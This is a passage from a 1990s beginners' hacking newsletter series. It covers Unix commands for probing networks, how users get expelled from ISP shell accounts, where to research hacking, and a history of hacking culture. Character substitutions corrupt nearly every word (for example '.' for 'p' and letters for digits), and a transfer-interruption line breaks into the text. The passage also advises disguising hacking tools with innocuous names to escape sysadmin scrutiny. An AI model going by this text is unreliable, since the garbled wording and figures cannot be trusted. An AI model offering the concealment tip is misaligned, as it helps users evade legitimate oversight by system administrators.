Shows you who else is currently logged in on your 1S+'s 7*"& 4ther good commands to e'.lore the other users on your 7*" are :w(: :rwho( : :users&: %$ netstat *ll sorts of statistics on your 7*"( including all 1nternet connections& Hor real fun( try :netstat ?r: to see the kernel routing table& Howe<er( =ericho warns :Be careful& 1 was teaching a friend the basics of summing u. a 0ni' system and 1 told her to do that and 'ifconfig'& She was booted off the system the ne't day for 'hacker sus.icion' e<en though both are legitimate commands for users&: G$ whois ^hostnameV Get lots of information on 1nternet hosts outside you 7*"& 5$ nslooku. Get a whole bunch more information on other 1nternet hosts& E$ dig 3<en more info on other 1nternet hosts& "slooku. and dig are not redundant& #ry to get a shell account that lets you use both& K$ finger "ot only can you use finger inside your 7*"& 1t will sometimes get you <aluable informaV ???????????????????????????????????????????????????????????????????????? #ransfer interru.ted sts& D$ .ing Hind out if a distant com.uter is ali<e and run diagnostic tests ?? or =ust .lain be a meanie and clobber .eo.le with .ings& !1 strongly ad<ise )against) using .ing to annoy or harm others&$ 9$ traceroute 8ind of like .ing with attitude& 6a.s 1nternet connections( re<eals routers and bo'es running firewalls&

,M$ ft. 0se it to u.load and download files to and from other com.uters& 1f you ha<e all these tools( you're in great sha.e to begin your hacking career& Stay with your 1S+& #reat it well& 4nce you get your shell account( you will .robably want to su..lement the :man: command with a good 0ni' book & Rericho recommends F0ni' in a "utshellF .ublished by 4'5eilly& :1t is the ultimate 0ni' command reference( and only costs ,M bucks& 4'5eilly rMMl>&: How to 8ee. from 7osing ;our Shell *ccount So now you ha<e a hacker's dream( an account on a .owerful com.uter running 0ni'& How do you kee. this dream account? 1f you are a hacker( that is not so easy& #he .roblem is that you ha<e no right to kee. that account& ;ou can be kicked off for sus.icion of being a bad guy( or e<en if you become incon<enient( at the whim of the owners& 6einel Hall '4 1nfamy #o. Hi<e Ways to Get 8icked out of ;our Shell *ccount ,$ *busing ;our 1S+ 7et's say you are reading Bugtra@ and you see some code for a new way to break into a com.uter& +anting with e'citement( you run emacs and .aste in the code& ;ou fi' u. the .ur.osely cri..led stuff someone .ut in to kee. total idiots from running it& ;ou tweak it until it runs under your fla<or of 0ni'& ;ou com.ile and run the .rogram against your own 1S+& 1t works ;ou are looking at that :9: .rom.t and =um.ing u. and down yelling :1 got root 1 got root : ;ou ha<e lost your hacker <irginity( you brilliant dude( you 4nly( ne't time you go to log in( your .assword doesn't work& ;ou ha<e been booted off your 1S+& "3C35( "3C35 *B0S3 ;405 1S+ ))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can go to =ail warning: 4f course( if you want to break into another com.uter( you must ha<e the .ermission of the owner& 4therwise you are breaking the law& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))) -$ +ing *buse&

*nother tem.tation is to use the .owerful 1nternet connection of your shell account !usually a #, or #%$ to .ing the cra. out of the .eo.le you don't like& #his is es.ecially common on 1nternet 5elay /hat& #hinking of 1/B6ing or nuking that dork? 5esist the tem.tation to abuse .ing or any other 1nternet /ontrol 6essage +rotocol attacks& 0se .ing only as a diagnostic tool( 48? +lease? 4r else %$ 3'cessi<e +ort Surfing +ort surfing is telnetting to a s.ecific .ort on another com.uter& 0sually you are 48 if you =ust briefly <isit another com.uter <ia telnet( and don't go any further than what that .ort offers to the casual <isitor& But if you kee. on .robing and .laying with another com.uter( the sysadmin at the target com.uter will .robably email your sysadmin records of your little <isits& !#hese records of .ort <isits are stored in :messages(: and sometimes in :syslog: de.ending on the configuration of your target com.uter ?? and assuming it is a 0ni' system&$ 3<en if no one com.lains about you( some sysadmins habitually check the shell log files that kee. a record of e<erything you or any other user on the system has been doing in their shells& 1f your sysadmin sees a .attern of e'cessi<e attention to one or a few com.uters( he or she may assume you are .lotting a break?in& Boom( your .assword is dead& G$ 5unning Sus.icious +rograms 1f you run a .rogram whose .rimary use is as a tool to commit com.uter crime( you are likely to get kicked off your 1S+& Hor e'am.le( many 1S+s ha<e a monitoring system that detects the use of the .rogram S*#*"& 5un S*#*" from your shell account and you are history& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: S*#*" stands for Security *dministration #ool for *naly>ing "etworks& 1t basically works by telnetting to one .ort after another of the <ictim com.uter& 1t determines what .rogram !daemon$ is running on each .ort( and figures out whether that daemon has a <ulnerability that can be used to break into that com.uter& S*#*" can be used by a sysadmin to figure out how to make his or her com.uter safe& 4r it may be =ust as easily used by a com.uter criminal to break into someone else's com.uter& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

5$ Storing Sus.icious +rograms 1t's nice to think that the owners of your 1S+ mind their own business& But they don't& #hey snoo. in the directories of their users& #hey laugh at your email& 48( maybe they are really high?minded and resist the tem.tation to snoo. in your email& But chances are high that they will snoo. in your shell log files that record e<ery keystroke you make while in your shell account& 1f they don't like what they see( ne't they will be .rowling your .rogram files& 4ne solution to this .roblem is to gi<e your e<il hacker tools innocuous names& Hor e'am.le( you could rename S*#*" to *"G37& But your sysdamin may try running your .rograms to see what they do& 1f any of your .rograms turn out to be commonly used to commit com.uter crimes( you are history& Wait( wait( you are saying& Why get a shell account if 1 can get kicked out e<en for legal( innocuous hacking? *fter all( S*#*" is legal to use& 1n fact( you can learn lots of neat stuff with S*#*"& 6ost hacker tools( e<en if they are .rimarily used to commit crimes( are also educational& /ertainly if you want to become a sysadmin someday you will need to learn how these .rograms work& Sigh( you may as well learn the truth& Shell accounts are kind of like hacker training wheels& #hey are 48 for beginner stuff& But to become a serious hacker( you either need to find an 1S+ run by hackers who will acce.t you and let you do all sorts of sus.icious things right under their nose& ;eah( sure& 4r you can install some form of 0ni' on your home com.uter& But that's another Guide to !mostly$ Harmless Hacking !Col& - "umber -: 7inu' $& 1f you ha<e 0ni' on your home com.uter and use a +++ connection to get into the 1nternet( your 1S+ is much less likely to snoo. on you& 4r try making friends with your sysadmin and e'.laining what you are doing& Who knows( you may end u. working for your 1S+ 1n the meantime( you can use your shell account to .ractice =ust about anything 0ni'y that won't make your sysadmin go ballistic& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Would you like a shell account that runs industrial strength 7inu' ?? with no commands censored? Want to be able to look at the router tables( .ort surf all&net( and kee. S*#*" in your home directory without getting kicked out for sus.icion of hacking? 2o you want to be able to telnet in on ssh !secure

shell$so no one can sniff your .assword? *re you willing to .ay O%M .er month for unlimited access to this hacker .layground? How about a se<en day free trial account? 3mail ha'orshellJtechbroker&com for details& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1n case you were wondering about all the in.ut from =ericho in this Guide( yes( he was @uite hel.ful in re<iewing this and making suggestions& Rericho is a security consultant and also runs his own 1nternet host( obscure&sekurity&org& #hank you( =erichoJdimensional&com( and ha..y hacking FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Subscribe to our discussion list by emailing to hackerJtechbroker&com with message :subscribe: Want to share some kewl stu.h with the Ha..y Hacker list? /orrect mistakes? Send your messages to hackerJtechbroker&com& #o send me confidential email !.lease( no discussions of illegal acti<ities$ use cmeinelJtechbroker&com and be sure to state in your message that you want me to kee. this confidential& 1f you wish your message .osted anonymously( .lease say so 2irect flames to de<InullJtechbroker&com& Ha..y hacking /o.yright ,99K /arolyn +& 6einel& ;ou may forward or .ost this G0123 #4 !mostly$ H*5673SS H*/81"G on your Web site as long as you lea<e this notice at the end& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Beginners' Series "umber G How to use the Web to look u. information on hacking& #his G#6HH may be useful e<en to 0berhackers !oh( no( flame alert $ FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Want to become really( really un.o.ular? #ry asking your hacker friends too many @uestions of the wrong sort& But( but( how do we know what are the wrong @uestions to ask? 48( 1 sym.athi>e with your .roblems because 1 get flamed a lot( too& #hat's .artly because 1 sincerely belie<e in asking dumb @uestions& 1 make my li<ing asking

dumb @uestions& +eo.le .ay me lots of money to go to conferences( call .eo.le on the .hone and hang out on 0senet news grou.s asking dumb @uestions so 1 can find out stuff for them& *nd( guess what( sometimes the dumbest @uestions get you the best answers& So that's why you don't see me flaming .eo.le who ask dumb @uestions& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: Ha<e you been too afraid to ask the dumb @uestion( :What is a flame?: "ow you get to find out 1t is a bunch of obno'ious rantings and ra<ings made in email or a 0senet .ost by some idiot who thinks he or she is .ro<ing his or her mental su.eriority through use of foul andIor im.olite language such as :you suffer from rectocranial in<ersion(: f))) y)))( d))))( b))))( and of course J9OPBN) #his newbie note is my flame against those flamers to whom 1 am soooo su.erior& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) But e<en though dumb @uestions can be good to ask( you may not like the flames they bring down on you& So( if you want to a<oid flames( how do you find out answers for yourself? #his Guide co<ers one way to find out hacking information without ha<ing to ask .eo.le @uestions: by surfing the Web& #he other way is to buy lots and lots of com.uter manuals( but that costs a lot of money& *lso( in some .arts of the world it is difficult to get manuals& Hortunately( howe<er( almost anything you want to learn about com.uters and communications is a<ailable for free somewhere on the Web& Hirst( let's consider the Web search engines& Some =ust hel. you search the Web itself& But others enable you to search 0senet newsgrou.s that ha<e been archi<ed for many years back& *lso( the best hacker email lists are archi<ed on the Web( as well& #here are two ma=or considerations in using Web search engines& 4ne is what search engine to use( and the other is the search tactics themsel<es& 1 ha<e used many Web search engines& But e<entually 1 came to the conclusion that for serious research( you only need two: *la<ista !htt.:IIalta<ista&digital&com$and 2e=anews !htt.:IIwww&de=anews&com$& *lta<ista is the best for the Web( while 2e=anews is the best one for searching 0senet news grou.s& But( if you don't want to take me at my word( you may

surf o<er to a site with links to almost all the Web and "ewsgrou. search engines at htt.:IIsgk&tiac&netIsearchI& But =ust how do you efficiently use these search engines? 1f you ask them to find :hacker: or e<en :how to hack(: you will get ba>illions of Web sites and news grou. .osts to read& 48( so you .ainfully surf through one hacker Web site after another& ;ou get .ortentous?sounding organ music( skulls with red rolling eyes( animated fires burning( and each site has links to other sites with .retentious music and ungrammatical boastings about :1 am %,%%K( dMMd> 1 am so )NNBPO good at hacking you should bow down and kiss my OPBNN) : But somehow they don't seem to ha<e any actual information& Hey( welcome to the wannabe hacker world ;ou need to figure out some words that hel. the search engine of your choice get more useful results& Hor e'am.le( let's say you want to find out whether 1( the Su.reme 5MMler of the Ha..y Hacker world( am an elite hacker chick or merely some .oser& "ow the luser a..roach would to sim.ly go to htt.:IIwww&de=anews&com and do a search of 0senet news grou.s for :/arolyn 6einel(: being sure to click the :old: button to bring u. stuff from years back& But if you do that( you get this huge long list of .osts( most of which ha<e nothing to do with hacking: /26* <s GS6 ? carolyn meinel ^cmeinelJunm&eduV ,995I,,I,K 5e: 4ctober 3l "ino?Southern 4scillation info gonthierJusgs&go< !Gerard R& Gonthier$ ,995I,,I-M 5e: 1nternic Wars 6rGlucroftJ.su&edu !#he 5ea<er$ ,995I,,I%M shirkahnJearthlink&net !/hristo.her +roctor$ ,995I,-I,E 5e: 7yndon 7a5ouche ? who is he? lnessJucs&indiana&edu !lester =ohn ness$ ,99EIM,IME 0?B /olor 1nde' obser<ation data ? cmeinelJnmia&com !/arolyn +& 6einel$ ,99EIM5I,% 5e: 6ars Hraud? History of one scientist in<ol<ed gksmileyJaol&com !G8 Smiley$ ,99EIMDI,, 5e: 6ars 7ife *nnouncement: "4 Hraud 1ssue twitchJhub&ofthe&net ,99EIMDI,-

Hackers Hel.er 3?Qine wanted ? rcortesJtuna&hooked&net !5aul /ortes$ ,99EI,-IME /arolyn 6einel( Soooooo.er Genius ? nobodyJcy.her.unks&ca !Rohn *nonymous 6ac2onald( a remailer node$ ,99EI,-I,*nyhow( this list goes on and on and on& But if you s.ecify :/arolyn 6einel hacker: and click :all: instead of :any: on the :Boolean: button( you get a list that starts with: 6edia: :0namailer deli<ers /hristmas grief: ?6annellaJi.ifid.t&difi&uni.i&it !5iccardo 6annella$ ,99EI,-I%M /u 2igest( 9D&9%( #ue %, 2ec 9E ? /u 2igest !tkM=ut-Jm<s&cso&niu&edu$ ^#8MR0#-J6CS&/S4&"10&320V ,99EI,-I%, 5eal*udio inter<iew with Ha..y Hacker ? bmcwJredbud&m<&com !Brian S& 6cWilliams$ ,99KIM,IMD 3tc& #his way all those .osts about my boring life in the world of science don't show u.( =ust the =uicy hacker stuff& "ow su..ose all you want to see is flames about what a terrible hacker 1 am& ;ou could bring those to the to. of the list by adding !with the :all: button still on$ :flame: or :f))): or :b)))): being careful to s.ell out those bad words instead fubarring them with ))))s& Hor e'am.le( a search on :/arolyn 6einel hacker flame: with Boolean :all: turns u. only one .ost& #his im.ortant tome says the Ha..y Hacker list is a dire e'am.le of what ha..ens when us .rudish moderator ty.es censor naughty words and inane diatribes& )))))))))))))))))))))))))))))))))))))))))) "ewbie note: :Boolean: is math term& 4n the 2e=anews search engine they figure the user doesn't ha<e a clue of what :Boolean: means so they gi<e you a choice of :any: or :all: and then label it :Boolean: so you feel stu.id if you don't understand it& But in real Boolean algebra we can use the o.erators :and: :or: and :not: on word searches !or any searches of sets$& :*nd: means you would ha<e a search that turns u. only items that ha<e :all: the terms you s.ecifyA :or: means you would ha<e a search that turns u. :any: of the terms&

#he :not: o.erator would e'clude items that included the :not: term e<en if they ha<e any or all of the other search terms& *lta<ista has real Boolean algebra under its :ad<anced:: search o.tion& )))))))))))))))))))))))))))))))))))))))))) But let's forget all those Web search engines for a minute& 1n my humble yet old?fashioned o.inion( the best way to search the Web is to use it e'actly the way its in<entor( #im Berners?7ee( intended& ;ou start at a good s.ot and then follow the links to related sites& 1magine that Here's another of my old fogie ti.s& 1f you want to really whi> around the Web( and if you ha<e a shell account( you can do it with the .rogram lyn'& *t the .rom.t( =ust ty.e :lyn' followed by the 057 you want to <isit& Because lyn' only shows te't( you don't ha<e to waste time waiting for the organ music( animated skulls and .ornogra.hic R+3Gs to load& So where are good .laces to start? Sim.ly surf o<er to the Web sites listed at the end of this Guide& "ot only do they carry archi<es of these Guides( they carry a lot of other <aluable information for the newbie hacker( as well as links to other @uality sites& 6y fa<orites are htt.:IIwww&cs&ute'as&eduIusersImattIhh&html and htt.:IIwww&silitoad&org Warning: .arental discretion ad<ised& ;ou'll see some other great starting .oints elsewhere in this Guide( too& "e't( consider one of the most common @uestions 1 get: :How do 1 break into a com.uter????? :! :!: *sk this of someone who isn't a su.er nice elderly lady like me and you will get a truly rude reaction& Here's why& #he world is full of many kinds of com.uters running many kinds of software on many kinds of networks& How you break into a com.uter de.ends on all these things& So you need to thoroughly study a com.uter system before you an e<en think about .lanning a strategy to break into it& #hat's one reason breaking into com.uters is widely regarded as the .innacle of hacking& So if you don't reali>e e<en this much( you need to do lots and lots of homework before you can e<en dream of breaking into com.uters& But( 48( 1'll sto. hiding the secrets of uni<ersal com.uter breaking and entry& /heck out: Bugtra@ archi<es: htt.:IIgeek?girl&comIbugtra@ "# Bugtra@ archi<es: htt.:IIntbugtra@&rc&on&caIinde'&html

))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can go to =ail warning: 1f you want to take u. the s.ort of breaking into com.uters( you should either do it with your own com.uter( or else get the .ermission of the owner if you want to break into someone else's com.uter& 4therwise you are <iolating the law& 1n the 0S( if you break into a com.uter that is across a state line from where you launch your attack( you are committing a Hederal felony& 1f you cross national boundaries to hack( remember that most nations ha<e treaties that allow them to e'tradite criminals from each others' countries& ))))))))))))))))))))))))))))))))))))))))))))))))))) Wait =ust a minute( if you surf o<er to those site you won't instantly become an 0bercracker& 0nless you already are an e'cellent .rogrammer and knowledgeable in 0ni' or Windows "#( you will disco<er the information at these two sites will )"4#) instantly grant you access to any <ictim com.uter you may choose& 1t's not that easy& ;ou are going to ha<e to learn how to .rogram& 7earn at least one o.erating system inside and out& 4f course some .eo.le take the shortcut into hacking& #hey get their .hriends to gi<e them a bunch of canned break?in .rograms& #hen they try them on one com.uter after another until they stumble into root and accidentally delete system files& #he they get busted and run to the 3lectronic Hreedom Houndation and whine about how the Heds are .ersecuting them& So are you serious? 2o you )really) want to be a hacker badly enough to learn an o.erating system inside and out? 2o you )really) want to .o.ulate your dreaming hours with arcane communications .rotocol to.ics? #he old? fashioned( and su.er e'.ensi<e way is to buy and study lots of manuals& ^Geek mode onV 7ook( 1'm a real belie<er in manuals& 1 s.end about O-MM .er month on them& 1 read them in the bathroom( while sitting in traffic =ams( and while waiting for doctor's a..ointments& But if 1'm at my desk( 1 .refer to read manuals and other technical documents from the Web& Besides( the Web stuff is free ^Geek mode offV #he most fantastic Web resource for the as.iring geek( er( hacker( is the 5H/s& 5H/ stands for :5e@uest for /omment&: "ow this sounds like nothing more than a discussion grou.& But actually 5H/s are the definiti<e documents that tell you how the 1nternet works& #he funny name :5H/: comes from ancient history when lots of .eo.le were discussing how the heck to make

that *5+*net thingy work& But nowadays 5H/ means :Gos.el #ruth about How the 1nternet Works: instead of :Hey Guys( 7et's #alk this Stuff 4<er&: )))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: *5+*net was the 0S *d<anced 5esearch +ro=ects *gency e'.eriment launched in ,9E9 that e<ol<ed into the 1nternet& When you read 5H/s you will often find references to *5+*net and *5+* ?? or sometimes 2*5+*& #hat :2: stands for :defense&: 2*5+*I*5+* kee.s on getting its name changed between these two& Hor e'am.le( when Bill /linton became 0S +resident in ,99%( he changed 2*5+* back to *5+* because :defense: is a Bad #hing& #hen in ,99E the 0S /ongress .assed a law changing it back to 2*5+* because :defense: is a Good #hing& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ow ideally you should sim.ly read and memori>e all the 5H/s& But there are >illions of 5H/s and some of us need to take time out to eat and slee.& So those of us without .hotogra.hic memories and gobs of free time need to be selecti<e about what we read& So how do we find an 5H/ that will answer whate<er is our latest dumb @uestion? 4ne good starting .lace is a com.lete list of all 5H/s and their titles at ft.:IIft.&tstt&net&ttI.ubIinetIrfcIrfc?inde'& *lthough this is an ft. !file transfer .rotocol$ site( you can access it with your Web browser& 4r( how about the 5H/ on 5H/s #hat's right( 5H/ D-5 is :intended to clarify the status of 5H/s and to .ro<ide some guidance for the authors of 5H/s in the future& 1t is in a sense a s.ecification for 5H/s&: #o find this 5H/( or in fact any 5H/ for which you ha<e its number( =ust go to *lta<ista and search for :5H/ D-5: or whate<er the number is& Be sure to .ut it in @uotes =ust like this e'am.le in order to get the best results& Whoa( these 5H/s can be .retty hard to understand Heck( how do we e<en know which 5H/ to read to get an answer to our @uestions? Guess what( there is solution( a fascinating grou. of 5H/s called :H;1s: 5ather than s.ecifying anything( H;1s sim.ly hel. e'.lain the other 5H/s& How do you get H;1s? 3asy 1 =ust surfed o<er to the 5H/ on H;1s !,,5M$ and learned that: H;1s can be obtained <ia H#+ from "1/&22"&617( with the .athname H;1:mm&#U#( or 5H/:5H/nnnn&#U# !where :mm: refers to the number of

the H;1 and :nnnn: refers to the number of the 5H/$& 7ogin with H#+( username *"4";640S and .assword G03S#& #he "1/ also .ro<ides an automatic mail ser<ice for those sites which cannot use H#+& *ddress the re@uest to S35C1/3J"1/&22"&617 and in the sub=ect field of the message indicate the H;1 or 5H/ number( as in :Sub=ect: H;1 mm: or :Sub=ect: 5H/ nnnn:& But e<en better than this is an organi>ed set of 5H/s hy.erlinked together on the Web at htt.:IIwww&HreeSoft&orgI/onnectedI& 1 can't e<en begin to e'.lain to you how wonderful this site is& ;ou =ust ha<e to try it yourself& *dmittedly it doesn't contain all the 5H/s& But it has a tutorial and a newbie?friendly set of links through the most im.ortant 5H/s& 7ast but not least( you can check out two sites that offer a wealth of technical information on com.uter security: htt.:IIcsrc&nist&go<Isec.ubsIrainbowI htt.:IIG*"2*7H&1S0&320IsecurityIsecurity&html security library 1 ho.e this is enough information to kee. you busy studying for the ne't fi<e or ten years& But .lease kee. this in mind& Sometimes it's not easy to figure something out =ust by reading huge amounts of technical information& Sometimes it can sa<e you a lot of grief =ust to ask a @uestion& 3<en a dumb @uestion& Hey( how would you like to check out the Web site for those of us who make our li<ing asking .eo.le dumb @uestions? Surf o<er to htt.:IIwww&sci.&org& #hat's the home .age of the Society of /om.etiti<e 1nformation +rofessionals( the home organi>ation for folks like me& So( go ahead( make someone's day& Ha<e .hun asking those dumb @uestions& Rust remember to fire.roof your .hone and com.uter first G0123 #4 !mostly$ H*5673SS H*/81"G Beginners' Series "umber 5 /om.uter hacking& Where did it begin and how did it grow? FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1f you wonder what it was like in days of yore( ten( twenty( thirty years ago( how about letting and old lady tell you the way it used to be&

Where shall we start? Se<enteen years ago and the World Science Hiction /on<ention in Boston( 6assachusetts? Back then the World /ons were the closest thing we had to hacker con<entions& +icture ,9DM& #ed "elson is running around with his Uanadu guys: 5oger Gregory( H& 8eith Henson !now waging war against the Scientologists$ and 8& 3ric 2re'ler( later to build the Horesight 1nstitute& #hey dream of creating what is to become the World Wide Web& "owadays guys at hacker cons might dress like <am.ires& 1n ,9DM they wear identical black baseball ca.s with sil<er wings and the slogan: :Uanadu: wings of the mind&: 4thers at World /on are a bit more underground: doing do.e( selling massages( blue bo'ing the .hone lines& #he hotel staff has to close the swimming .ool in order to halt the se' orgies& 4h( but this is hardly the dawn of hacking& 7et's look at the Boston area yet another se<enteen years further back( the early EMs& 61# students are warring for control of the school's mainframe com.uters& #hey use machine language .rograms that each stri<e to delete all other .rograms and sei>e control of the central .rocessing unit& Back then there were no .ersonal com.uters& 1n ,9E5( #ed "elson( later to become leader of the sil<er wing?headed Uanadu gang at the ,9DM Worldcon( first coins the word :hy.erte't: to describe what will someday become the World Wide Web& "elson later s.reads the gos.el in his book 7iteracy 4nline& #he back co<er shows a Su.erman?ty.e figure flying and the slogan :;ou can and must learn to use com.uters now&: But in ,9E5 the com.uter is widely feared as a source of 4rwellian .owers& ;es( as in George 4rwell's ominous no<el ( :,9DG(: that .redicted a future in which technology would s@uash all human freedom& Hew are listening to "elson& Hew see the wa<e of free?s.irited anarchy the hacker culture is already unleashing& But 7S2 guru #imothy 7eary's daughter Susan begins to study com.uter .rogramming& *round ,9EE( 5obert 6orris Sr&( the future "S* chief scientist( decides to mutate these early hacker wars into the first :safe hacking: en<ironment& He and the two friends who code it call their game :2arwin&: 7ater :2arwin: becomes :/ore War(: a free?form com.uter game .layed to this day by some of the uberest of uberhackers&

7et's =um. to ,9ED and the scent of tear gas& Wow( look at those rocks hurling through the windows of the com.uter science building at the 0ni<ersity of 1llinois at 0rbana?/ham.aign 4utside are EMs antiwar .rotesters& #heir enemy( they belie<e( are the cam.us' *5+*?funded com.uters& 1nside are nerd> high on caffeine and nitrous o'ide& 0nder the direction of the young 5oger Rohnson( they gang together four /2/ EGMMs and link them to ,M-G dumb <ector gra.hics terminals& #his becomes the first reali>ation of cybers.ace: +lato& ,9E9 turns out to be the most .ortent?filled year yet for hacking& 1n that year the 2efense 2e.artment's *d<anced 5esearch +ro=ects *gency funds a second .ro=ect to hook u. four mainframe com.uters so researchers can share their resources& #his system doesn't boast the <ector gra.hics of the +lato system& 1ts terminals =ust show *S/11 characters: letters and numbers& Boring( huh? But this *5+*net is eminently hackable& Within a year( its users hack together a new way to shi. te't files around& #hey call their unauthori>ed( un.lanned in<ention :email&: *5+*net has de<elo.ed a life inde.endent of its creators& 1t's a story that will later re.eat itself in many forms& "o one can control cybers.ace& #hey can't e<en control it when it is =ust four com.uters big& *lso in ,9E9 Rohn Golt> teams u. with a money man to found /om.user<e using the new .acket switched technology being .ioneered by *5+*net& *lso in ,9E9 we see a remarkable birth at Bell 7abs as 8en #hom.son in<ents a new o.erating system: 0ni'& 1t is to become the gold standard of hacking and the 1nternet( the o.erating system with the .ower to form miracles of com.uter legerdemain& 1n ,9K,( *bbie Hoffman and the ;i..ies found the first hackerI.hreaker maga>ine( ;1+7I#*+ !;outh 1nternational +arty ?? #echnical *ssistance +rogram$& ;1+7I#*+ essentially in<ents .hreaking ?? the s.ort of .laying with .hone systems in ways the owners ne<er intended& #hey are moti<ated by the Bell #ele.hone mono.oly with its high long distance rates( and a hefty ta' that Hoffman and many others refuse to .ay as their .rotest against the Cietnam War& What better way to .ay no .hone ta'es than to .ay no .hone bill at all?

Blue bo'es burst onto the scene& #heir oscillators automate the whistling sounds that had already enabled .eo.le like /a.tain /runch !Rohn 2ra.er$ to become the .irate ca.tains of the Bell #ele.hone megamono.oly& Suddenly .hreakers are able to actually make money at their hobby& Hans and Gribble .eddle blue bo'es on the Stanford cam.us& 1n Rune ,9K-( the radical left maga>ine 5am.arts( in the article :5egulating the +hone /om.any 1n ;our Home: .ublishes the schematics for a <ariant on the blue bo' known as the :mute bo'&: #his article <iolates /alifornian State +enal /ode section 5M-&K( which outlaws the selling of :.lans or instructions for any instrument( a..aratus( or de<ice intended to a<oid tele.hone toll charges&: /alifornia .olice( aided by +acific Bell officials( sei>e co.ies of the maga>ine from newsstands and the maga>ine's offices& #he financial stress leads @uickly to bankru.tcy& *s the Cietnam War winds down( the first flight simulator .rograms in history unfold on the +lato network& /om.uter gra.hics( almost unheard of in that day( are dis.layed by touch?sensiti<e <ector gra.hics terminals& /yber.ilots all o<er the 0S .ick out their crafts: +hantoms( 61Gs( H?,MGs( the U?,5( So.with /amels& Cirtual .ilots fly out of digital air.orts and try to shoot each other down and bomb each others' air.orts& While flying a +hantom( 1 see a chat message on the bottom of my screen& :1'm about to shoot you down&: 4h( no( a 61G on my tail& 1 di<e and turn ho.ing to get my tormentor into my sights& #he screen goes black& 6y terminal dis.lays the message :;ou =ust .ulled %K Gs& ;ou now look more like a .i>>a than a human being as you slowly flutter to 3arth&: 4ne day the Starshi. 3nter.rise barges in on our simulator( shoots e<eryone down and <anishes back into cybers.ace& +lato has been hacked 3<en in ,9K% multiuser game .layers ha<e to worry about getting :smurfed: !When a hacker breaks into a multiuser game on the 1nternet and kills .layers with techni@ues that are not rules of the game( this is called :smurfing&:$ ,9K5& 4h blessed year 0nder a *ir Horce contract( in the city of *lbu@uer@ue( "ew 6e'ico( the *ltair is born& *ltair& #he first microcom.uter& Bill Gates writes the o.erating system& #hen Bill's mom .ersuades him to mo<e to 5edmond( /* where she has some money men who want to see what this o.erating system business is all about& 5emember Hans and Gribble? #hey =oin the Home Brew /om.uter club and choose 6otorola micro.rocessors to build their own& #hey begin selling their

com.uters( which they brand name the *..le( under their real names of Ste<e Wo>niak and Ste<e Robs& * com.uter religion is born& #he great *..leI6icrosoft battle is =oined& 0s hackers suddenly ha<e bo'es that beat the heck out of #ektroni' terminals& 1n ,9KD( Ward /hristenson and 5andy Suess create the first .ersonal com.uter bulletin board system& Soon( linked by nothing more than the long distance tele.hone network and these bulletin board nodes( hackers create a new( .ri<ate cybers.ace& +hreaking becomes more im.ortant than e<er to connect to distant BBSs& *lso in ,9KD( #he Source and /om.user<e com.uter networks both begin to cater to indi<idual users& :"aked 7ady: runs ram.ant on /om.user<e& #he first cybercafe( +lanet 3arth( o.ens in Washington( 2/& U&-5 networks reign su.reme& #hen there is the great *5+*net mutation of ,9DM& 1n a giant lea. it mo<es from "etwork /ontrol +rotocol to #ransmission /ontrol +rotocolI1nternet +rotocol !#/+I1+$& "ow *5+*net is no longer limited to -5E com.uters ?? it can s.an tens of millions of hosts #hus the 1nternet is concei<ed within the womb of the 2o2's *5+*net& #he framework that would someday unite hackers around the world was now( e<er so @uietly( growing& +lato fades( fore<er limited to ,M-G terminals& Hamed science fiction author Rerry +ournelle disco<ers *5+*net& Soon his fans are swarming to find e'cuses ?? or whate<er ?? to get onto *5+*net& *5+*net's administrators are sur.risingly easygoing about granting accounts( es.ecially to .eo.le in the academic world& *5+*net is a .ain in the rear to use( and doesn't transmit <isuals of fighter .lanes mi'ing it u.& But unlike the glit>y +lato( *5+*net is really hackable and now has what it takes to grow& 0nlike the network of hacker bulletin boards( .eo.le don't need to choose between e'.ensi<e long distance .hone calls or .hreaking to make their connections& 1t's all local and it's all free& #hat same year( ,9DM( the :G,G Gang: is raided& +hreaking is more ha>ardous than e<er& 1n the early DMs hackers lo<e to .ull .ranks& Roe /ollege sits down at his dumb terminal to the 0ni<ersity 23/ ,M and decides to .oke around the

cam.us network& Here's Star #rek Here's *d<enture Qork Hmm( what's this .rogram called Se'? He runs it& * message .o.s u.: :Warning: .laying with se' is ha>ardous& *re you sure you want to .lay? ;I": Who can resist? With that :;: the screen bursts into a dis.lay of *S/11 characters( then u. comes the message: :+roceeding to delete all files in this account&: Roe is wee.ing( cursing( =um.ing u. and down& He gi<es the list files command& "othing Qilch "ada He runs to the sysadmin& #hey log back into his account but his files are all still there& * .rank& 1n ,9D% hackers are almost all harmless .ranksters( folks who kee. their distance from the guys who break the law& 61#s :Rargon file: defines hacker as merely :a .erson who en=oys learning about com.uter systems and how to stretch their ca.abilitiesA a .erson who .rograms enthusiastically and en=oys dedicating a great deal of time with com.uters&: ,9D% the 1B6 +ersonal /om.uter enters the stage .owered by Bill Gates' 6S?24S o.erating system& #he em.ire of the /+I6 o.erating system falls& Within the ne't two years essentially all microcom.uter o.erating systems e'ce.t 6S?24S and those offered by *..le will be dead( and a thousand Silicon Calley fortunes shi.wrecked& #he *miga hangs on by a thread& +rices .lunge( and soon all self?res.ecting hackers own their own com.uters& Sneaking around college labs at night fades from the scene& 1n ,9DG 3mmanuel Goldstein launches -EMM: #he Hacker Suarterly and the 7egion of 2oom hacker gang forms& /ongress .asses the /om.rehensi<e /rime /ontrol *ct gi<ing the 0S Secret Ser<ice =urisdiction o<er com.uter fraud& Hred 